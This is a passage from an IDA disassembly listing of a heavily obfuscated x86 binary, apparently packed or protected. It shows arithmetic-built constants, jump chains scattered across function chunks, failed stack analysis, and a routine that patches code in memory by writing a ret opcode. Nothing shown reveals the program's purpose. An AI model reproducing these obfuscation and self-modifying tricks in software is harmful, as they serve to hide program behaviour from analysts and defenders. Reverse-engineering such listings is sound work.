loc_44DCBC: ; CODE XREF: sub_457A66-B77Ej
jns loc_43F6E9
xchg edi, ebp
pushf
loc_44DCC5: ; CODE XREF: sub_43DCFF:loc_43F1C1j
xor eax, 5BF07A0Eh
add eax, ebp
jmp loc_449962
; END OF FUNCTION CHUNK FOR sub_457A66
; ---------------------------------------------------------------------------
; START OF FUNCTION CHUNK FOR sub_44E2C4
loc_44DCD2: ; CODE XREF: sub_44E2C4:loc_44FC49j
cmp ebp, 0B9ED05B9h
jmp loc_446AE1
; END OF FUNCTION CHUNK FOR sub_44E2C4
; ---------------------------------------------------------------------------
; START OF FUNCTION CHUNK FOR sub_43CDBA
loc_44DCDD: ; CODE XREF: sub_43CDBA:loc_442E3Bj
mov [ebp-1Ch], eax
loc_44DCE0: ; CODE XREF: sub_446F14+3j
inc dword ptr [ebp-20h]
mov eax, [ebp-1Ch]
and eax, 0FFh
mov eax, ds:dword_43DF48[eax*4]
call sub_43A513
loc_44DCF7: ; CODE XREF: sub_447EB5+131Fj
jmp loc_45A85B
; END OF FUNCTION CHUNK FOR sub_43CDBA
; ---------------------------------------------------------------------------
dd 30D18A0Fh, 0FEE90000h
db 84h, 2 dup(0)
; ---------------------------------------------------------------------------
loc_44DD07: ; CODE XREF: ut7h7i2x:00440299j
or ecx, edx
loc_44DD09: ; CODE XREF: ut7h7i2x:loc_44028Ej
sub ebx, 67B46BD7h
add ebx, 0C9761A75h
mov [ebx], eax
pop ebx
lea eax, nullsub_418
jmp loc_45A581
; ---------------------------------------------------------------------------
; START OF FUNCTION CHUNK FOR sub_439788
loc_44DD23: ; CODE XREF: sub_439788:loc_44CDA3j
adc esi, eax
rol eax, 14h
and esi, 0D042CED7h
or edx, 7F678EF3h
jmp loc_44455B
; END OF FUNCTION CHUNK FOR sub_439788
; =============== S U B R O U T I N E =======================================
sub_44DD39 proc near ; CODE XREF: ut7h7i2x:00440EE7j
; DATA XREF: sub_43BA9E:loc_440EDDo
; FUNCTION CHUNK AT 00439E37 SIZE 00000005 BYTES
; FUNCTION CHUNK AT 0043CB7A SIZE 0000001D BYTES
; FUNCTION CHUNK AT 0043FBD4 SIZE 00000015 BYTES
; FUNCTION CHUNK AT 00440390 SIZE 0000000B BYTES
; FUNCTION CHUNK AT 00452D4E SIZE 00000008 BYTES
; FUNCTION CHUNK AT 00453DAE SIZE 00000027 BYTES
; FUNCTION CHUNK AT 00458563 SIZE 00000005 BYTES
push 25866F95h
pop eax
and eax, 0BA59FD48h
or eax, 0E8FD09A4h
test eax, 1000h
jmp loc_440390
sub_44DD39 endp ; sp-analysis failed
; =============== S U B R O U T I N E =======================================
sub_44DD56 proc near ; CODE XREF: sub_446CA0+8242p
; ut7h7i2x:00454CFAj
var_4 = dword ptr -4
arg_0 = dword ptr 4
; FUNCTION CHUNK AT 004395A8 SIZE 00000015 BYTES
; FUNCTION CHUNK AT 0043DA3A SIZE 00000017 BYTES
; FUNCTION CHUNK AT 00441366 SIZE 00000017 BYTES
; FUNCTION CHUNK AT 004420FB SIZE 00000011 BYTES
; FUNCTION CHUNK AT 004441BB SIZE 00000005 BYTES
; FUNCTION CHUNK AT 004459BC SIZE 00000019 BYTES
; FUNCTION CHUNK AT 004488C3 SIZE 0000000D BYTES
; FUNCTION CHUNK AT 004498C5 SIZE 0000001D BYTES
; FUNCTION CHUNK AT 0044C90C SIZE 00000006 BYTES
; FUNCTION CHUNK AT 00453436 SIZE 00000005 BYTES
xchg edi, [esp+0]
pop edi
xchg ecx, [esp-4+arg_0]
mov edi, ecx
pop ecx
add edi, 0AED75030h
jmp loc_441366
sub_44DD56 endp ; sp-analysis failed
; ---------------------------------------------------------------------------
loc_44DD6B: ; DATA XREF: sub_451B75+Ao
xchg eax, [esp]
; START OF FUNCTION CHUNK FOR sub_439BD1
loc_44DD6E: ; CODE XREF: sub_439BD1:loc_4582BEj
mov eax, [ebp-10h]
push eax
call sub_44DB3E
test eax, eax
jz loc_4484F2
jmp loc_4499BE
; END OF FUNCTION CHUNK FOR sub_439BD1
; ---------------------------------------------------------------------------
test al, al
jz nullsub_529
jmp loc_459721
; ---------------------------------------------------------------------------
; START OF FUNCTION CHUNK FOR sub_454AFE
loc_44DD91: ; CODE XREF: sub_454AFE+16j
jnz loc_454AD9
shr edi, 6
sub ecx, 0F9B4DC4Eh
jmp loc_454AD9
; END OF FUNCTION CHUNK FOR sub_454AFE
; ---------------------------------------------------------------------------
loc_44DDA5: ; CODE XREF: ut7h7i2x:loc_44DDD9j
ror eax, 14h
push offset loc_44C3CE
jmp locret_442B51
; ---------------------------------------------------------------------------
loc_44DDB2: ; CODE XREF: ut7h7i2x:004436CCj
jo loc_44C35E
mov esi, [eax]
cdq
loc_44DDBB: ; CODE XREF: ut7h7i2x:loc_4582DFj
and esi, 0C87AF868h
jmp loc_4444BF
; ---------------------------------------------------------------------------
cmp ebp, esi
jmp loc_444518
; ---------------------------------------------------------------------------
locret_44DDCD: ; CODE XREF: ut7h7i2x:loc_447E4Dj
retn
; ---------------------------------------------------------------------------
loc_44DDCE: ; DATA XREF: sub_439BF8+12B58o
add esi, 83AA831Ch
call sub_450D13
loc_44DDD9: ; CODE XREF: ut7h7i2x:00454774j
jmp loc_44DDA5
; ---------------------------------------------------------------------------
loc_44DDDE: ; CODE XREF: ut7h7i2x:0044BE4Cj
jmp locret_449923
; ---------------------------------------------------------------------------
; START OF FUNCTION CHUNK FOR sub_43FF65
loc_44DDE3: ; CODE XREF: sub_43FF65-2148j
; sub_43FF65:loc_453776j
jmp loc_45AC0B
; ---------------------------------------------------------------------------
loc_44DDE8: ; CODE XREF: sub_43FF65+1287Ej
jnz loc_442400
lea eax, [ebp-0Ch]
push eax
call sub_440493
push eax
call sub_44F43B
; END OF FUNCTION CHUNK FOR sub_43FF65
; START OF FUNCTION CHUNK FOR sub_44B789
loc_44DDFD: ; CODE XREF: sub_44B789-67BFj
jmp loc_44AA43
; END OF FUNCTION CHUNK FOR sub_44B789
; ---------------------------------------------------------------------------
; START OF FUNCTION CHUNK FOR sub_449D60
loc_44DE02: ; CODE XREF: sub_449D60-54EAj
jmp loc_44BB4D
; END OF FUNCTION CHUNK FOR sub_449D60
; ---------------------------------------------------------------------------
; START OF FUNCTION CHUNK FOR sub_439788
loc_44DE07: ; CODE XREF: sub_439788+15j
jmp loc_444E12
; END OF FUNCTION CHUNK FOR sub_439788
; ---------------------------------------------------------------------------
; START OF FUNCTION CHUNK FOR sub_45983B
loc_44DE0C: ; CODE XREF: sub_45983B:loc_445149j
jnz loc_448DA3
loc_44DE12: ; CODE XREF: ut7h7i2x:00445663j
jmp loc_451E70
; END OF FUNCTION CHUNK FOR sub_45983B
; ---------------------------------------------------------------------------
; START OF FUNCTION CHUNK FOR sub_43FF65
loc_44DE17: ; CODE XREF: sub_43FF65:loc_44BB72j
jns sub_44D79C
add esp, 0FFFFFFE0h
push 0ECB56DB9h
pop eax
sub eax, 0E5E22E41h
xor eax, 7A630148h
add eax, ebp
jmp loc_439EE1
; END OF FUNCTION CHUNK FOR sub_43FF65
; [00000001 BYTES: COLLAPSED FUNCTION nullsub_294. PRESS KEYPAD "+" TO EXPAND]
; ---------------------------------------------------------------------------
loc_44DE3A: ; CODE XREF: ut7h7i2x:0043912Cj
jmp loc_43BA03
; =============== S U B R O U T I N E =======================================
sub_44DE3F proc near ; CODE XREF: ut7h7i2x:0044499Ej
; sub_456B5E+3A52p
arg_0 = dword ptr 4
xchg ecx, [esp+0]
pop ecx
xchg ebx, [esp-4+arg_0]
jmp sub_453D8B
sub_44DE3F endp ; sp-analysis failed
; ---------------------------------------------------------------------------
loc_44DE4B: ; CODE XREF: ut7h7i2x:loc_4391C5j
xchg esi, [esp]
push edi
call sub_44F7A9
; START OF FUNCTION CHUNK FOR sub_448215
loc_44DE54: ; CODE XREF: sub_448215+9929j
jmp loc_43B2CC
; END OF FUNCTION CHUNK FOR sub_448215
; ---------------------------------------------------------------------------
; START OF FUNCTION CHUNK FOR sub_446258
loc_44DE59: ; CODE XREF: sub_446258-A934j
and edi, 0E88BAD5Bh
loc_44DE5F: ; CODE XREF: sub_446258:loc_4495C5j
push 0B5D16DE4h
and eax, ecx
jmp loc_43901B
; END OF FUNCTION CHUNK FOR sub_446258
; ---------------------------------------------------------------------------
loc_44DE6B: ; CODE XREF: ut7h7i2x:loc_4410E5j
; ut7h7i2x:00458AA7j
push edx
mov edx, eax
; START OF FUNCTION CHUNK FOR sub_445188
loc_44DE6E: ; CODE XREF: sub_445188:loc_44E823j
xchg edx, [esp-8+arg_4]
lea eax, loc_4396E8
push eax
call sub_4572A7
loc_44DE7D: ; CODE XREF: ut7h7i2x:0044F8BDj
jmp nullsub_462
; END OF FUNCTION CHUNK FOR sub_445188
; ---------------------------------------------------------------------------
; START OF FUNCTION CHUNK FOR sub_446F56
loc_44DE82: ; CODE XREF: sub_446F56+2541j
jmp loc_44C82B
; END OF FUNCTION CHUNK FOR sub_446F56
; ---------------------------------------------------------------------------
; START OF FUNCTION CHUNK FOR sub_43FF65
loc_44DE87: ; CODE XREF: sub_43FF65+43EDj
popf
or esi, 1C6D93BEh
loc_44DE8E: ; CODE XREF: sub_43FF65:loc_44698Bj
mov eax, [ebp-0Ch]
push offset loc_44B4C5
jmp sub_45A8FC
; END OF FUNCTION CHUNK FOR sub_43FF65
; ---------------------------------------------------------------------------
loc_44DE9B: ; CODE XREF: ut7h7i2x:0045A290j
or edx, 147A43FCh
sub edx, 6B4759F5h
xor edx, 0BF3C943Bh
sub edx, 0FD166AE3h
add edx, 30D1893Dh
xchg edx, [esp]
jmp sub_43AA94
; ---------------------------------------------------------------------------
loc_44DEC1: ; CODE XREF: ut7h7i2x:0044D982j
xchg eax, [esp]
mov edx, eax
pop eax
and edx, 56489E36h
jmp loc_44EFB5
; ---------------------------------------------------------------------------
; START OF FUNCTION CHUNK FOR sub_43BDD6
loc_44DED2: ; CODE XREF: sub_43BDD6+Aj
mov [ebp-1Ch], eax
push offset loc_445FD9
jmp nullsub_105
; END OF FUNCTION CHUNK FOR sub_43BDD6
; =============== S U B R O U T I N E =======================================
sub_44DEDF proc near ; DATA XREF: sub_445A99+6o
xchg ebx, [esp+0]
jmp sub_45601B
sub_44DEDF endp
; ---------------------------------------------------------------------------
; START OF FUNCTION CHUNK FOR sub_43B7F7
loc_44DEE7: ; CODE XREF: sub_43B7F7-64Fj
jnp loc_454451
loc_44DEED: ; CODE XREF: sub_43B7F7:loc_446D93j
mov eax, [ebp-4]
cmp byte ptr [eax], 0F1h
jnz loc_457941
jmp loc_446F71
; END OF FUNCTION CHUNK FOR sub_43B7F7
; [00000001 BYTES: COLLAPSED FUNCTION nullsub_327. PRESS KEYPAD "+" TO EXPAND]
; =============== S U B R O U T I N E =======================================
sub_44DEFF proc near ; CODE XREF: sub_44DEFF-C2DBp
; ut7h7i2x:0044A6A8j
var_4 = dword ptr -4
arg_4 = dword ptr 8
arg_8 = dword ptr 0Ch
; FUNCTION CHUNK AT 0043AE5D SIZE 00000024 BYTES
; FUNCTION CHUNK AT 00441C1F SIZE 0000000F BYTES
; FUNCTION CHUNK AT 004467F1 SIZE 0000000D BYTES
; FUNCTION CHUNK AT 00446D6C SIZE 00000005 BYTES
; FUNCTION CHUNK AT 00447CCE SIZE 0000001C BYTES
; FUNCTION CHUNK AT 0044A9B6 SIZE 00000015 BYTES
; FUNCTION CHUNK AT 0044B27A SIZE 00000010 BYTES
; FUNCTION CHUNK AT 00452206 SIZE 00000005 BYTES
xchg esi, [esp+0]
pop esi
call sub_444E04
push 0F91181D8h
pop eax
jmp loc_447CCE
sub_44DEFF endp ; sp-analysis failed
; =============== S U B R O U T I N E =======================================
sub_44DF13 proc near ; DATA XREF: sub_44EC6F+4EFEo
var_4 = dword ptr -4
; FUNCTION CHUNK AT 0044A390 SIZE 00000016 BYTES
mov edx, [esp+0]
push edx
mov edx, ebx
xchg edx, [esp+4+var_4]
jmp loc_44A390
sub_44DF13 endp
; ---------------------------------------------------------------------------
locret_44DF21: ; CODE XREF: ut7h7i2x:loc_4574E5j
retn
; ---------------------------------------------------------------------------
loc_44DF22: ; CODE XREF: ut7h7i2x:0044616Ej
jmp nullsub_8
; ---------------------------------------------------------------------------
; START OF FUNCTION CHUNK FOR sub_441765
loc_44DF27: ; CODE XREF: sub_441765-4544j
jmp loc_44C21C
; END OF FUNCTION CHUNK FOR sub_441765
; ---------------------------------------------------------------------------
loc_44DF2C: ; CODE XREF: ut7h7i2x:004555F0j
; ut7h7i2x:00455604j
xor eax, 0DB5E542h
call sub_43AED9
push ecx
push 4767EFDFh
pop ecx
jmp loc_44BC5B
; ---------------------------------------------------------------------------
; START OF FUNCTION CHUNK FOR sub_453E14
loc_44DF43: ; CODE XREF: sub_453E14:loc_450CAAj
rol esi, 11h
add ebp, 120FB7ADh
and ebx, ebp
jmp loc_44A5B7
; END OF FUNCTION CHUNK FOR sub_453E14
; ---------------------------------------------------------------------------
test ecx, eax
jmp loc_44F578
; ---------------------------------------------------------------------------
loc_44DF5A: ; DATA XREF: ut7h7i2x:00453BA0o
cmp al, 0A4h
jz loc_45793C
jmp loc_43B804
; =============== S U B R O U T I N E =======================================
sub_44DF67 proc near ; CODE XREF: sub_43E6EB+179C0p
; sub_4503C3:loc_4598E2j
xchg esi, [esp+0]
pop esi
lea eax, loc_43EC52
mov byte ptr [eax], 0C3h
jmp loc_43EC52
sub_44DF67 endp ; sp-analysis failed
; =============== S U B R O U T I N E =======================================
sub_44DF79 proc near ; CODE XREF: sub_4176BD+14p
; sub_41A2D8+90p ...
; FUNCTION CHUNK AT 0043A04D SIZE 00000005 BYTES
; FUNCTION CHUNK AT 0043BBCA SIZE 00000005 BYTES
; FUNCTION CHUNK AT 0043C122 SIZE 00000013 BYTES
; FUNCTION CHUNK AT 0043D518 SIZE 00000005 BYTES
; FUNCTION CHUNK AT 0043EEB5 SIZE 0000000B BYTES
; FUNCTION CHUNK AT 0043F980 SIZE 00000014 BYTES
; FUNCTION CHUNK AT 0044000F SIZE 00000017 BYTES
; FUNCTION CHUNK AT 004410DA SIZE 0000000B BYTES
; FUNCTION CHUNK AT 00442926 SIZE 00000017 BYTES
; FUNCTION CHUNK AT 00443D77 SIZE 0000001F BYTES
; FUNCTION CHUNK AT 00446E20 SIZE 00000010 BYTES
; FUNCTION CHUNK AT 0044711A SIZE 0000000B BYTES
; FUNCTION CHUNK AT 0044741A SIZE 0000000A BYTES
; FUNCTION CHUNK AT 004484FE SIZE 00000005 BYTES
; FUNCTION CHUNK AT 0044BDDF SIZE 0000000B BYTES
; FUNCTION CHUNK AT 00452E09 SIZE 00000007 BYTES
; FUNCTION CHUNK AT 0045A7EA SIZE 00000011 BYTES
jnb loc_43C122
mov eax, ds:dword_459858
or eax, eax
jnz loc_44711A
jmp loc_43BBCA
sub_44DF79 endp ; sp-analysis failed
; [00000001 BYTES: COLLAPSED FUNCTION nullsub_171. PRESS KEYPAD "+" TO EXPAND]
; ---------------------------------------------------------------------------
; START OF FUNCTION CHUNK FOR sub_43AB62
loc_44DF93: ; CODE XREF: sub_43AB62+BDBCj
jmp loc_44261D
; END OF FUNCTION CHUNK FOR sub_43AB62
; ---------------------------------------------------------------------------
locret_44DF98: ; CODE XREF: ut7h7i2x:loc_43D3E0j
retn
; ---------------------------------------------------------------------------
; START OF FUNCTION CHUNK FOR sub_448CBC
loc_44DF99: ; CODE XREF: sub_448CBC-D679j
jmp loc_43BE24
; END OF FUNCTION CHUNK FOR sub_448CBC
; ---------------------------------------------------------------------------
; START OF FUNCTION CHUNK FOR sub_45742F
loc_44DF9E: ; CODE XREF: sub_45742F-16088j
jno loc_44085E
loc_44DFA4: ; CODE XREF: sub_45742F:loc_43A5D3j
add edi, 8902EAA0h
xchg edi, [esp-4+arg_0]
jmp sub_43AA94
; END OF FUNCTION CHUNK FOR sub_45742F
; ---------------------------------------------------------------------------
; START OF FUNCTION CHUNK FOR sub_44917B
loc_44DFB2: ; CODE XREF: sub_44917B-8B35j
or esi, 0B2313481h
loc_44DFB8: ; CODE XREF: ut7h7i2x:004520D8j
sub esi, 1D02E26Eh
add esi, 9E9A6A30h
add esi, ebp
add esi, 7E6AF961h
jmp loc_456305
; END OF FUNCTION CHUNK FOR sub_44917B
; [00000001 BYTES: COLLAPSED FUNCTION nullsub_167. PRESS KEYPAD "+" TO EXPAND]
; ---------------------------------------------------------------------------
; START OF FUNCTION CHUNK FOR sub_4436F6
loc_44DFD2: ; CODE XREF: sub_4436F6+Fj
jmp loc_4500A3
; END OF FUNCTION CHUNK FOR sub_4436F6
; ---------------------------------------------------------------------------
; START OF FUNCTION CHUNK FOR sub_44E8DE
loc_44DFD7: ; CODE XREF: sub_44E8DE+10j
call sub_439788
loc_44DFDC: ; CODE XREF: sub_4471CA+9676j
jmp sub_44ED9F
; END OF FUNCTION CHUNK FOR sub_44E8DE
; ---------------------------------------------------------------------------
; START OF FUNCTION CHUNK FOR sub_4448AF
loc_44DFE1: ; CODE XREF: sub_4448AF-AC7Fj
jmp loc_43AC6B
; END OF FUNCTION CHUNK FOR sub_4448AF
; ---------------------------------------------------------------------------
; START OF FUNCTION CHUNK FOR sub_448321
loc_44DFE6: ; CODE XREF: sub_448321:loc_450810j
xchg edx, [esp+0]
mov edi, edx
pop edx
or edi, 0A7CF63BDh
jnz loc_4498F4
sub eax, 0A344DFCh
jmp loc_44E4EE
; END OF FUNCTION CHUNK FOR sub_448321
; ---------------------------------------------------------------------------
loc_44E003: ; CODE XREF: ut7h7i2x:004440B4j
xchg ebx, [esp]
pop ebx
xchg edi, [esp]
mov edx, edi
pop edi
jb loc_455B36
mov eax, [esp]
push edx
jmp loc_4500B6
; ---------------------------------------------------------------------------
push 77FA70BBh
jmp loc_45340B
; ---------------------------------------------------------------------------
loc_44E026: ; DATA XREF: ut7h7i2x:0044D533o
call sub_4417AF
push 0C0801BC3h
pop eax
or eax, 0D70465E1h
xor eax, 8EEC4533h
sub eax, 90F8BB37h
add eax, 53EE8721h
call sub_43AA94
jmp loc_442E71
; ---------------------------------------------------------------------------
; START OF FUNCTION CHUNK FOR sub_44EB88
loc_44E053: ; CODE XREF: sub_44EB88-12926j
pushf
sbb eax, 2E9485AAh
jmp loc_441622
; END OF FUNCTION CHUNK FOR sub_44EB88
; ---------------------------------------------------------------------------
; START OF FUNCTION CHUNK FOR sub_4508DB
loc_44E05F: ; CODE XREF: sub_4508DB+9423j
sub al, 99h
mov edx, [ebp+var_4]
imul byte ptr [edx]
cmp al, 0A4h
jmp loc_43FEEA
; END OF FUNCTION CHUNK FOR sub_4508DB
; ---------------------------------------------------------------------------
push ebx
push 1E31EF50h
pop ebx
loc_44E074: ; CODE XREF: ut7h7i2x:loc_43DA29j
rol ebx, 18h
jmp loc_43EC79
; ---------------------------------------------------------------------------
test ebx, eax
jmp loc_458834
; ---------------------------------------------------------------------------
; START OF FUNCTION CHUNK FOR sub_43AB62
loc_44E083: ; CODE XREF: sub_43AB62+1443Ej
jnz loc_44C649
not eax
jmp loc_459ACA
; END OF FUNCTION CHUNK FOR sub_43AB62
; =============== S U B R O U T I N E =======================================
sub_44E090 proc near ; DATA XREF: sub_451900:loc_45A5D8o
mov [ebp-2Ch], eax
mov dword ptr [ebp-20h], 1
sub_44E090 endp ; sp-analysis failed
; START OF FUNCTION CHUNK FOR sub_44A3BB
loc_44E09A: ; CODE XREF: sub_44A3BB-62BAj
jno loc_453593
mov eax, [ebp-18h]
push offset sub_459070
jmp nullsub_108
; END OF FUNCTION CHUNK FOR sub_44A3BB
; ---------------------------------------------------------------------------
; START OF FUNCTION CHUNK FOR sub_444029
loc_44E0AD: ; CODE XREF: sub_444029+8EEDj
mov eax, [ebp-1Ch]
mov eax, [eax]
mov [ebp-14h], eax
cmp dword ptr [ebp-14h], 0
jmp loc_445436
; END OF FUNCTION CHUNK FOR sub_444029
; ---------------------------------------------------------------------------
loc_44E0BE: ; CODE XREF: ut7h7i2x:0043DEFEj
jno loc_43DB48
not eax
loc_44E0C6: ; CODE XREF: ut7h7i2x:loc_43C9D3j
call sub_448F31
; START OF FUNCTION CHUNK FOR sub_455145
loc_44E0CB: ; CODE XREF: sub_455145-226Dj
jmp loc_452495
; END OF FUNCTION CHUNK FOR sub_455145
; ---------------------------------------------------------------------------
; START OF FUNCTION CHUNK FOR sub_43DBEC
loc_44E0D0: ; CODE XREF: sub_43DBEC+132A1j
shl eax, 17h
jmp loc_446C1E
; END OF FUNCTION CHUNK FOR sub_43DBEC
; ---------------------------------------------------------------------------
jmp ds:dword_41D080
; ---------------------------------------------------------------------------
loc_44E0DE: ; CODE XREF: ut7h7i2x:00447C3Aj
jmp loc_43CA06
; ---------------------------------------------------------------------------
loc_44E0E3: ; CODE XREF: ut7h7i2x:0043A8CDj
jmp loc_447C90
; [00000001 BYTES: COLLAPSED FUNCTION nullsub_113. PRESS KEYPAD "+" TO EXPAND]
; ---------------------------------------------------------------------------
test [ebx-780000B0h], ch
add al, 24h
mov edx, eax
pop eax
mov eax, [esp]
push edx
call sub_452E7F
jmp loc_444B15
; ---------------------------------------------------------------------------
loc_44E102: ; CODE XREF: ut7h7i2x:loc_44516Dj
jnz loc_450D4A
jmp loc_4482F0
; ---------------------------------------------------------------------------
loc_44E10D: ; CODE XREF: ut7h7i2x:00444EC4j
push offset sub_439D16
jmp locret_4405CB
; ---------------------------------------------------------------------------
jnp loc_45272E
jmp sub_44445F
; ---------------------------------------------------------------------------
loc_44E122: ; DATA XREF: sub_43DD17+3587o
jnz loc_43D48F
; START OF FUNCTION CHUNK FOR sub_44E2E0
loc_44E128: ; CODE XREF: sub_44E2E0:loc_44604Cj
call sub_4528B1
mov edx, 0E5254649h
call sub_44B8F8
mov ds:dword_43A7A8, eax
jmp loc_44A2FB
; END OF FUNCTION CHUNK FOR sub_44E2E0
; ---------------------------------------------------------------------------
; START OF FUNCTION CHUNK FOR sub_43DD17
loc_44E141: ; CODE XREF: sub_43DD17:loc_441291j
cmp ds:dword_43A7A8, 0
jnz loc_43D48F
call sub_4528B1
jmp loc_447B02
; END OF FUNCTION CHUNK FOR sub_43DD17
; =============== S U B R O U T I N E =======================================
sub_44E158 proc near ; DATA XREF: sub_449B57+6o
push 7EA11F40h
pop esi
and esi, 0F0691C2Ah
add esi, 716EAEA5h
rol esi, 8
sub esi, 6C4985Bh
add esi, 773EA396h
xchg esi, [esp+0]
jmp sub_454196
sub_44E158 endp
; ---------------------------------------------------------------------------
; START OF FUNCTION CHUNK FOR sub_459E7A
loc_44E181: ; CODE XREF: sub_459E7A+Aj
jz loc_439D73
push esi
mov esi, ebx
xchg esi, [esp+0Ch+var_C]
push 523E22A3h
jmp loc_44434C
; END OF FUNCTION CHUNK FOR sub_459E7A
; ---------------------------------------------------------------------------
; START OF FUNCTION CHUNK FOR sub_459653
loc_44E197: ; CODE XREF: sub_459653+Ej
jo loc_44B221
adc edx, [esp-8+arg_8]
add esp, 8
; END OF FUNCTION CHUNK FOR sub_459653
; START OF FUNCTION CHUNK FOR sub_44A3BB
loc_44E1A4: ; CODE XREF: sub_44A3BB-4031j
mov eax, [eax]
add eax, [ebp-4]
push offset loc_452329
jmp nullsub_397
; END OF FUNCTION CHUNK FOR sub_44A3BB
; ---------------------------------------------------------------------------
; START OF FUNCTION CHUNK FOR sub_4459EE
loc_44E1B3: ; CODE XREF: ut7h7i2x:004509A8j
; sub_4459EE:loc_45591Dj
jnz loc_4551E9
jmp loc_4550B2
; END OF FUNCTION CHUNK FOR sub_4459EE
; ---------------------------------------------------------------------------
locret_44E1BE: ; CODE XREF: ut7h7i2x:0045306Fj
retn
; ---------------------------------------------------------------------------
; START OF FUNCTION CHUNK FOR sub_459D9F
loc_44E1BF: ; CODE XREF: sub_459D9F+5j
call sub_44E835
mov eax, 19EDC823h
call sub_43AA94
mov ds:off_41D198, eax
lea eax, sub_452D3D
call sub_439B38
loc_44E1DF: ; CODE XREF: ut7h7i2x:00457806j
jmp sub_43AA94
; END OF FUNCTION CHUNK FOR sub_459D9F
; ---------------------------------------------------------------------------
loc_44E1E4: ; CODE XREF: ut7h7i2x:00456A47j
jmp loc_44C12F
; ---------------------------------------------------------------------------
loc_44E1E9: ; CODE XREF: ut7h7i2x:00455802j
jmp loc_454D47
; ---------------------------------------------------------------------------
loc_44E1EE: ; CODE XREF: ut7h7i2x:0044B2B4j
; ut7h7i2x:loc_450CF9j
jno loc_4581EA
sbb edx, esi
; START OF FUNCTION CHUNK FOR sub_43E700
loc_44E1F6: ; CODE XREF: sub_43E700:loc_443B32j
sub eax, 2E06F714h
xor eax, 2BE6CA03h
push ebx
push 998C88C4h
xchg ebp, [esp+8+var_8]
mov ebx, ebp
jmp loc_44A643
; END OF FUNCTION CHUNK FOR sub_43E700
; [00000001 BYTES: COLLAPSED FUNCTION nullsub_252. PRESS KEYPAD "+" TO EXPAND]
; ---------------------------------------------------------------------------
; START OF FUNCTION CHUNK FOR sub_454B2B
loc_44E213: ; CODE XREF: sub_454B2B-1FFAj
jmp loc_45A08B
; END OF FUNCTION CHUNK FOR sub_454B2B
; ---------------------------------------------------------------------------
; START OF FUNCTION CHUNK FOR sub_4431FF
loc_44E218: ; CODE XREF: sub_4431FF+EE8Cj
jmp loc_441446
; END OF FUNCTION CHUNK FOR sub_4431FF
; ---------------------------------------------------------------------------
; START OF FUNCTION CHUNK FOR sub_449DC4
loc_44E21D: ; CODE XREF: sub_449DC4:loc_452FC7j
jnz loc_458AB4
jmp loc_4467C3
; END OF FUNCTION CHUNK FOR sub_449DC4
; ---------------------------------------------------------------------------
; START OF FUNCTION CHUNK FOR sub_453D8B
loc_44E228: ; CODE XREF: sub_453D8B-B9E9j
and edx, 6E8D4A1Fh
rol edx, 3
xor edx, 0D0EBB9ABh
add edx, 5F812D5Dh
xchg edx, [esp+0]
loc_44E240: ; CODE XREF: sub_4544E6-4BD7j
jmp sub_43AA94
; END OF FUNCTION CHUNK FOR sub_453D8B
; ---------------------------------------------------------------------------
xor ebx, esi
jmp loc_44BDEB
; [00000001 BYTES: COLLAPSED FUNCTION nullsub_518. PRESS KEYPAD "+" TO EXPAND]
; ---------------------------------------------------------------------------
loc_44E24D: ; CODE XREF: ut7h7i2x:00442817j
jmp loc_444092
; =============== S U B R O U T I N E =======================================
sub_44E252 proc near ; CODE XREF: sub_449216j
; DATA XREF: sub_450651:loc_44920Co
; FUNCTION CHUNK AT 0045672D SIZE 00000005 BYTES
mov al, 1
jmp loc_45672D
sub_44E252 endp
; ---------------------------------------------------------------------------
; START OF FUNCTION CHUNK FOR sub_450651
loc_44E259: ; CODE XREF: sub_447267+Ej
; sub_450651-3B2Fj
inc [ebp+var_4]
jmp loc_458094
; END OF FUNCTION CHUNK FOR sub_450651
; =============== S U B R O U T I N E =======================================
sub_44E261 proc near ; CODE XREF: sub_4456B6:loc_44F4A7p
call sub_450714
push offset loc_44C648
jmp nullsub_109
sub_44E261 endp
; ---------------------------------------------------------------------------
loc_44E270: ; CODE XREF: ut7h7i2x:0043FC50j
push edx
call sub_44E3D4
loc_44E276: ; CODE XREF: ut7h7i2x:0045ACBAj
jmp loc_4541B7
; ---------------------------------------------------------------------------
; START OF FUNCTION CHUNK FOR sub_43ADDB
loc_44E27B: ; CODE XREF: ut7h7i2x:0044783Bj
; sub_43ADDB:loc_452668j
sub esi, 26F66DDCh
loc_44E281: ; CODE XREF: ut7h7i2x:loc_449859j
xor esi, 35B2DB05h
add eax, esi
pop esi
mov eax, [eax]
jmp loc_452C17
; END OF FUNCTION CHUNK FOR sub_43ADDB
; ---------------------------------------------------------------------------
; START OF FUNCTION CHUNK FOR sub_449FF0
loc_44E291: ; CODE XREF: sub_449FF0j
call sub_43CEF8
push edi
mov edi, ecx
xchg edi, [esp+4+var_4]
mov ecx, [esp+4+arg_8]
push offset sub_4569C5
jmp loc_458539
; END OF FUNCTION CHUNK FOR sub_449FF0
; =============== S U B R O U T I N E =======================================
sub_44E2AA proc near ; CODE XREF: ut7h7i2x:0044123Aj
; sub_451EF2-6CACp
; FUNCTION CHUNK AT 0043952E SIZE 00000006 BYTES
; FUNCTION CHUNK AT 00440B14 SIZE 00000013 BYTES
; FUNCTION CHUNK AT 00447E52 SIZE 0000000E BYTES
; FUNCTION CHUNK AT 00449642 SIZE 00000010 BYTES
; FUNCTION CHUNK AT 0044AFEE SIZE 00000005 BYTES
xchg edx, [esp+0]
pop edx
mov eax, ds:dword_43A7BC
or eax, eax
jmp loc_449642
sub_44E2AA endp ; sp-analysis failed
; [00000001 BYTES: COLLAPSED FUNCTION nullsub_127. PRESS KEYPAD "+" TO EXPAND]
; ---------------------------------------------------------------------------
push 0
call sub_454ABB
locret_44E2C3: ; CODE XREF: ut7h7i2x:00456DD5j
retn
; =============== S U B R O U T I N E =======================================
sub_44E2C4 proc near ; CODE XREF: sub_43B873-2311j
; ut7h7i2x:loc_4398E7p ...
var_4 = dword ptr -4
; FUNCTION CHUNK AT 004392D2 SIZE 0000000A BYTES
; FUNCTION CHUNK AT 00439DFD SIZE 00000008 BYTES
; FUNCTION CHUNK AT 0043FD63 SIZE 00000005 BYTES
; FUNCTION CHUNK AT 00443159 SIZE 00000005 BYTES
; FUNCTION CHUNK AT 004454E0 SIZE 00000005 BYTES
; FUNCTION CHUNK AT 00446AE1 SIZE 0000001F BYTES
; FUNCTION CHUNK AT 0044A277 SIZE 00000013 BYTES
; FUNCTION CHUNK AT 0044A993 SIZE 00000005 BYTES
; FUNCTION CHUNK AT 0044D2B1 SIZE 0000001D BYTES
; FUNCTION CHUNK AT 0044DCD2 SIZE 0000000B BYTES
; FUNCTION CHUNK AT 0044F7EA SIZE 0000000E BYTES
